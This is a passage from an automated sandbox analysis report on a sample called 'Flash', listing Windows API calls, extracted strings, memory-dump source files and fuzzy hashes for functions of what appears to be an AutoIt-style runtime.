                                                        • CharUpperBuffW.USER32(?,?), ref: 00A544AC
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00A5456C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 3974292440-719923060
                                                        • Opcode ID: 165d7c81deb3cdd4a228525ec4eaad905fdbd8169a37f74f4115f40c65b0a3f7
                                                        • Instruction ID: b6a71e0079d2396a53545779467a74af582da6cf101c8d4373f44634376b7b09
                                                        • Opcode Fuzzy Hash: 165d7c81deb3cdd4a228525ec4eaad905fdbd8169a37f74f4115f40c65b0a3f7
                                                        • Instruction Fuzzy Hash: 86A17A302543119FCB14EF24C951B6AB3A5BFC9319F108969F89A9B7E2DB30EC49CB51
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00A456E1
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00A456EC
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00A456F7
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00A45702
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00A4570D
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00A45718
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00A45723
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00A4572E
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00A45739
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00A45744
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00A4574F
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00A4575A
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00A45765
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00A45770
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00A4577B
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00A45786
                                                        • GetCursorInfo.USER32(?), ref: 00A45796
                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 00A457C1
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                        • String ID:
                                                        • API String ID: 3215588206-0
                                                        • Opcode ID: 336be55ccf27f50a823db9be3fe585ce978e9971db9b70a722dd5d1353f2e669
                                                        • Instruction ID: 6b751b30a5507cb78843e2cb821695646f347ad3194d1ba6aa578ab7046b05c9
                                                        • Opcode Fuzzy Hash: 336be55ccf27f50a823db9be3fe585ce978e9971db9b70a722dd5d1353f2e669
                                                        • Instruction Fuzzy Hash: 40415370E44319ABDB109FBA8C49D6FFEF8EF91B10B10452FE509E7291DAB8A501CE51
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A2B17B
                                                        • __swprintf.LIBCMT ref: 00A2B21C
                                                        • _wcscmp.LIBCMT ref: 00A2B22F
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A2B284
                                                        • _wcscmp.LIBCMT ref: 00A2B2C0
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00A2B2F7
                                                        • GetDlgCtrlID.USER32(?), ref: 00A2B349
                                                        • GetWindowRect.USER32(?,?), ref: 00A2B37F
                                                        • GetParent.USER32(?), ref: 00A2B39D
                                                        • ScreenToClient.USER32(00000000), ref: 00A2B3A4
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00A2B41E
                                                        • _wcscmp.LIBCMT ref: 00A2B432
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00A2B458
                                                        • _wcscmp.LIBCMT ref: 00A2B46C
                                                          • Part of subcall function 009F385C: _iswctype.LIBCMT ref: 009F3864
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        • Opcode ID: 1a9784ecaa492fa2f14ac740c01b6af744d940393ad217214b4f93a3d63376c8
                                                        • Instruction ID: 76f4d778d68724112b513b9354d5212448ebf55530bf450bf74799a9fef6fcf8
                                                        • Opcode Fuzzy Hash: 1a9784ecaa492fa2f14ac740c01b6af744d940393ad217214b4f93a3d63376c8
                                                        • Instruction Fuzzy Hash: 8BA1D071214726AFD718EF68D884FEAB7E8FF44350F108629F999C2191DB30E955CBA0
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00A2BAB1
                                                        • _wcscmp.LIBCMT ref: 00A2BAC2
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00A2BAEA
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00A2BB07
                                                        • _wcscmp.LIBCMT ref: 00A2BB25
                                                        • _wcsstr.LIBCMT ref: 00A2BB36
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A2BB6E
                                                        • _wcscmp.LIBCMT ref: 00A2BB7E
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00A2BBA5
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00A2BBEE
                                                        • _wcscmp.LIBCMT ref: 00A2BBFE
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00A2BC26
                                                        • GetWindowRect.USER32(00000004,?), ref: 00A2BC8F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: b657d8dfdd5663e81c63406f144334659654311ff02bbc49ee9122b85cbdff63
                                                        • Instruction ID: 6e7d6aa9597e18990098dc1b7206ee708d58927dba820c397d990cfe6d6b8176
                                                        • Opcode Fuzzy Hash: b657d8dfdd5663e81c63406f144334659654311ff02bbc49ee9122b85cbdff63
                                                        • Instruction Fuzzy Hash: 5781BE710142199FDB04DF18E885FAA77E8FF88314F04847AFD898A096DB74DD46CBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: c50b29a82b692da4bf8b2a6fd80728857b0a92524829e4f21a294bfe5d26e54e
                                                        • Instruction ID: 8a3551116fe0b59c587669e90d6a0a277cb6c1c69c3fe8bb16efcc414a6e1756
                                                        • Opcode Fuzzy Hash: c50b29a82b692da4bf8b2a6fd80728857b0a92524829e4f21a294bfe5d26e54e
                                                        • Instruction Fuzzy Hash: C5310030A40219A7EB01FB61ED03FAD73B4AF20750F200936F691B10D6EF6A6E40C762
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 00A2CBAA
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A2CBBC
                                                        • SetWindowTextW.USER32(?,?), ref: 00A2CBD3
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00A2CBE8
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00A2CBEE
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A2CBFE
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00A2CC04
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A2CC25
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A2CC3F
                                                        • GetWindowRect.USER32(?,?), ref: 00A2CC48
                                                        • SetWindowTextW.USER32(?,?), ref: 00A2CCB3
                                                        • GetDesktopWindow.USER32 ref: 00A2CCB9
                                                        • GetWindowRect.USER32(00000000), ref: 00A2CCC0
                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00A2CD0C
                                                        • GetClientRect.USER32(?,?), ref: 00A2CD19
                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00A2CD3E
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A2CD69
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID:
                                                        • API String ID: 3869813825-0
                                                        • Opcode ID: bc9b26dfeb6ad3fb30b1f51cc189e478f8de87c32592c5c789f7426db7ba1349
                                                        • Instruction ID: ec7767e5fa9d6e3be9f7ec5aa9a5c7046a68de23e919d4e5499f3a31f67959b4
                                                        • Opcode Fuzzy Hash: bc9b26dfeb6ad3fb30b1f51cc189e478f8de87c32592c5c789f7426db7ba1349
                                                        • Instruction Fuzzy Hash: 83517A70900709AFDB20DFA8DE8AF6FBBF5FF04715F004928E586A25A0D7B4A955CB50
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A5A87E
                                                        • DestroyWindow.USER32(00000000,?), ref: 00A5A8F8
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A5A972
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A5A994
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A5A9A7
                                                        • DestroyWindow.USER32(00000000), ref: 00A5A9C9
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,009D0000,00000000), ref: 00A5AA00
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A5AA19
                                                        • GetDesktopWindow.USER32 ref: 00A5AA32
                                                        • GetWindowRect.USER32(00000000), ref: 00A5AA39
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A5AA51
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A5AA69
                                                          • Part of subcall function 009D29AB: GetWindowLongW.USER32(?,000000EB), ref: 009D29BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$tooltips_class32
                                                        • API String ID: 1297703922-3619404913
                                                        • Opcode ID: ed0226685e4262b3c2e5b3511435c78c916bf8485c941df0e07e84db986e8dc5
                                                        • Instruction ID: 76b81cb747ccd9374295eb684b1a3430f8a83bc1269d400650b5781c5bddaf48
                                                        • Opcode Fuzzy Hash: ed0226685e4262b3c2e5b3511435c78c916bf8485c941df0e07e84db986e8dc5
                                                        • Instruction Fuzzy Hash: 4C718975250244AFD721CF68CC48F6B7BE5FB98341F044A1DF986872A1DBB0A946CB62
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • DragQueryPoint.SHELL32(?,?), ref: 00A5CCCF
                                                          • Part of subcall function 00A5B1A9: ClientToScreen.USER32(?,?), ref: 00A5B1D2
                                                          • Part of subcall function 00A5B1A9: GetWindowRect.USER32(?,?), ref: 00A5B248
                                                          • Part of subcall function 00A5B1A9: PtInRect.USER32(?,?,00A5C6BC), ref: 00A5B258
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A5CD38
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A5CD43
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A5CD66
                                                        • _wcscat.LIBCMT ref: 00A5CD96
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A5CDAD
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A5CDC6
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A5CDDD
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A5CDFF
                                                        • DragFinish.SHELL32(?), ref: 00A5CE06
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A5CEF9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 169749273-3440237614
                                                        • Opcode ID: 854a943079fa67032680bf96dba3c212fa7d4514e512e43cfd7b6fac009a4ead
                                                        • Instruction ID: 79d31b83e4378cd610349c8fcb4b813daaa40c1cdeee5d0057e46e6c9cf08079
                                                        • Opcode Fuzzy Hash: 854a943079fa67032680bf96dba3c212fa7d4514e512e43cfd7b6fac009a4ead
                                                        • Instruction Fuzzy Hash: BD612871508301AFC711EF94DC85E9FBBF8FBD8750F004A2AF595922A1DB709A49CB62
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000000), ref: 00A3831A
                                                        • VariantCopy.OLEAUT32(00000000,?), ref: 00A38323
                                                        • VariantClear.OLEAUT32(00000000), ref: 00A3832F
                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A3841D
                                                        • __swprintf.LIBCMT ref: 00A3844D
                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00A38479
                                                        • VariantInit.OLEAUT32(?), ref: 00A3852A
                                                        • SysFreeString.OLEAUT32(?), ref: 00A385BE
                                                        • VariantClear.OLEAUT32(?), ref: 00A38618
                                                        • VariantClear.OLEAUT32(?), ref: 00A38627
                                                        • VariantInit.OLEAUT32(00000000), ref: 00A38665
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                        • API String ID: 3730832054-3931177956
                                                        • Opcode ID: efae6205a2afa8e9078c3752782565f70c996c5e98a5575786359473f95aa844
                                                        • Instruction ID: dd261a7bf090f5a80698625eb7ed8eff8eb79a3650bd2880e7de92af7294f0d8
                                                        • Opcode Fuzzy Hash: efae6205a2afa8e9078c3752782565f70c996c5e98a5575786359473f95aa844
                                                        • Instruction Fuzzy Hash: 45D1DD71A04719EBDB209FA5C886BAEB7B4BF44B00F248555F405AF281DF78EC44DBA1
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A54A61
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A54AAC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: 234b763f94a062df223f995fe5fae1d46d5ef8e687aceb7656478ca6bd72fe8c
                                                        • Instruction ID: 5a202a2f2e44111eba2a024cf49bed01c7d2162813d31dd61fb108e1b94e4897
                                                        • Opcode Fuzzy Hash: 234b763f94a062df223f995fe5fae1d46d5ef8e687aceb7656478ca6bd72fe8c
                                                        • Instruction Fuzzy Hash: EE917C342047119BCB14EF64C451A6AB7A2BFD8358F108869FC965B3A3DB31ED89CB91
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 00A3E31F
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A3E32F
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A3E33B
                                                        • __wsplitpath.LIBCMT ref: 00A3E399
                                                        • _wcscat.LIBCMT ref: 00A3E3B1
                                                        • _wcscat.LIBCMT ref: 00A3E3C3
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A3E3D8
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A3E3EC
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A3E41E
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A3E43F
                                                        • _wcscpy.LIBCMT ref: 00A3E44B
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A3E48A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 85f68dd5733d93ba53d7f77479e4a331c4822e90e6d7380a7485eb438317b73d
                                                        • Instruction ID: 9e1f9f89a4e9bdc7d95e31a7f1b635242964f281a8f19130bc0b1ef7e2617e69
                                                        • Opcode Fuzzy Hash: 85f68dd5733d93ba53d7f77479e4a331c4822e90e6d7380a7485eb438317b73d
                                                        • Instruction Fuzzy Hash: E46148725046459FCB10EFA4C844EAFB3E8FF89310F04891EF99987291EB35E945CB92
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A3A2C2
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A3A2E3
                                                        • __swprintf.LIBCMT ref: 00A3A33C
                                                        • __swprintf.LIBCMT ref: 00A3A355
                                                        • _wprintf.LIBCMT ref: 00A3A3FC
                                                        • _wprintf.LIBCMT ref: 00A3A41A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 311963372-3080491070
                                                        • Opcode ID: deb6ec2dbe0eaea85fe7e3ff19aace87a324360a1730d43b37356b4a10c08eea
                                                        • Instruction ID: 32a74418fab7a1741b1d6855bafbc8dc5d12b1c116769b5a097b0b409bd78578
                                                        • Opcode Fuzzy Hash: deb6ec2dbe0eaea85fe7e3ff19aace87a324360a1730d43b37356b4a10c08eea
                                                        • Instruction Fuzzy Hash: 2A510071900119BACF15EBE0DD46FEEB779AF14340F204526F505B20A2EB752F99CB61
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00A1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00A43FF9,00000000), ref: 00A3009A
                                                        • LoadStringW.USER32(00000000,?,00A1F8B8,00000001), ref: 00A300A3
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        • GetModuleHandleW.KERNEL32(00000000,00A97310,?,00000FFF,?,?,00A1F8B8,00000001,0000138C,00000001,00000000,00000001,?,00A43FF9,00000000,00000001), ref: 00A300C5
                                                        • LoadStringW.USER32(00000000,?,00A1F8B8,00000001), ref: 00A300C8
                                                        • __swprintf.LIBCMT ref: 00A30118
                                                        • __swprintf.LIBCMT ref: 00A30129
                                                        • _wprintf.LIBCMT ref: 00A301D2
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A301E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
